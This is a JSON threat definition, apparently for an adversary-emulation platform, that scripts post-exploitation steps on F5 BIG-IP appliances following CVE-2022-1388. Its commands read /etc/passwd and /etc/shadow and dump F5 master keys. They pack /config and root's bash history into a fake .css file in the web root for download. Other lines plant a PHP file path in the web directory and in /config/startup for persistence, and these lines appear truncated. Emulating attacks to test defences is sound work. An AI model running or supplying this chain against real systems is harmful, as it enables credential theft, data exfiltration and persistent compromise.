{ "threat": { "category": "User-Defined", "description": "Post exploitation steps observed on F5 BIG-IP appliances as of 2022-05-09.", "display_name": "CVE-2022-1388-steps", "name": "CVE-2022-1388-steps", "operating_system_name": "linux", "script": { "0": { "conf": "{\"--cp\":\"127.0.0.1:443\",\"--secure\":true,\"--multipart\":10240}", "module": "https", "type": "initialization" }, "1": { "module": "loader", "module_to_load": "run", "request": "--load run", "type": "message" }, "2": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "echo \"=====\"", "type": "message" }, "3": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "cat /etc/hostname", "type": "message" }, "4": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "echo \"=====\"", "type": "message" }, "5": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "cat /etc/hosts", "type": "message" }, "6": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "cat /etc/passwd", "type": "message" }, "7": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "echo \"=====\"", "type": "message" }, "8": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "cat /etc/shadow", "type": "message" }, "9": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "echo \"=====\"", "type": "message" }, "10": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "cat /etc/resolv.conf", "type": "message" }, "11": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "echo \"=====\"", "type": "message" }, "12": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "f5mku -f", "type": "message" }, "13": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "echo \"=====\"", "type": "message" }, "14": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "f5mku -K", "type": "message" }, "15": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "echo \"=====\"", "type": "message" }, "16": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "f5mku -Z", "type": "message" }, "17": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "echo \"=====\"", "type": "message" }, "18": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "mount -o rw,remount /usr", "type": "message" }, "19": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "tar zcf /usr/local/www/xui/common/css/2e9928af731.css /config/* /root/.bash_history", "type": "message" }, "20": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "echo \" /usr/local/www/xui/common/css/e9928af731css.php", "type": "message" }, "21": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "echo \"echo \\\" /usr/local/www/xui/common/css/e9928af731css.php\" >> /config/startup", "type": "message" }, "22": { "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db", "module": "run", "request": "mount -o ro,remount /usr", "type": "message" } }, "signature": "3ce1cbeedb097e1a0c3b83ebdd6c955a7433cf29", "tags": [] } }